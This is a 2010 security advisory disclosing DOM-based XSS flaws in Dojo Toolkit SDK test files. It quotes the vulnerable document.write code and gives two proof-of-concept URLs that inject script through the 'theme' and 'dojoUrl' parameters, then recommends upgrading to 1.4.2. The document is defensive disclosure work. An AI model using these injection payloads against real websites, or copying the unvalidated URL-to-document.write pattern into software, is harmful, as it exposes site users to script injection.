Multiple DOM-Based XSS in Dojo Toolkit SDK

[labs () gdssecurity com]

===========================================================
Multiple DOM-Based XSS in Dojo Toolkit SDK 
Public Release Date: 3/12/2010
Adam Bixby - Gotham Digital Science (labs () gdssecurity com) 
Affected Software:  Dojo Toolkit SDK <= Build 1.4.1 
Browser used for testing: IE8 (8.0.7600.16385)
Severity: High
===========================================================
1. Summary
===========================================================

The Dojo Toolkit is an open source modular JavaScript library/toolkit designed to ease the rapid development of cross 
platform, JavaScript/Ajax based applications and web sites.  Multiple instances of DOM-based Cross Site Scripting (XSS) 
vulnerabilities were found in the _testCommon.js and runner.html files within the SDK.  The XSS vulnerabilities appear 
to affect all websites that deploy any of the affected SDK files.  These files are designed for testing, however a 
Google search identified numerous sites which have deployed these files along with the core framework components.

More information on DOM-based XSS can be found at http://www.owasp.org/index.php/DOM_Based_XSS.

The vendor (Dojo Foundation) was notified of this issue on February 19, 2010.  The vendor responded by releasing 
version 1.4.2 on March 12, 2010 and has also issued a security bulletin: 
http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/.
 

===========================================================
2. Technical Details
===========================================================

File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\dijit\tests\_testCommon.js
1) Data enters via "theme" URL parameter through the window.location.href property.
Line 25:
var str = window.location.href.substr(window.location.href.indexOf("?")+1).split(/#/);
  ..snip..
2) The "theme" variable with user-controllable input is then passed into "themeCss" and "themeCssRtl" which is then 
passed to document.write(). Writing the un-validated data to HTML creates the XSS exposure.
Line 54:
  ..snip..
var themeCss = d.moduleUrl("dijit.themes",theme+"/"+theme+".css");
var themeCssRtl = d.moduleUrl("dijit.themes",theme+"/"+theme+"_rtl.css");
document.write('<link rel="stylesheet" type="text/css" href="'+themeCss+'">'); 
document.write('<link rel="stylesheet" type="text/css" href="'+themeCssRtl+'">');
 

===========================================================

File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\util\doh\runner.html
1) Data enters via "dojoUrl" or "testUrl" URL parameters through the window.location.search property.
Line 40:
var qstr = window.location.search.substr(1);
  ..snip..
2) The "dojoUrl" and "testUrl" variables with user-controllable input are passed to document.write(). Writing the 
un-validated data to HTML creates the XSS exposure.
Line 64:
document.write("<scr"+"ipt type='text/javascript' djConfig='isDebug: true' src='"+dojoUrl+"'></scr"+"ipt>");
  ..snip..
document.write("<scr"+"ipt type='text/javascript' src='"+testUrl+".js'></scr"+"ipt>");


===========================================================
3. Proof-of-Concept Exploit
===========================================================

This vulnerability can be exploited against websites that have deployed any of the 145 SDK files which reference 
_testCommon.js.

Reproduction Request:
http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>

(Note: test_Button.html is one of the SDK files that includes the _testCommon.js file)

============================================================

This vulnerability can be exploited against any website that has deployed the runner.html file.

Reproduction Request:
http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
 

===========================================================
4. Recommendation
===========================================================

Update to Dojo Toolkit SDK 1.4.2

===========================================================
5. About Gotham Digital Science
===========================================================

Gotham Digital Science (GDS) is an information security consulting firm that works with clients to identify, prevent, 
and manage security risks. For more information on GDS, please contact info () gdssecurity com or visit 
http://www.gdssecurity.com.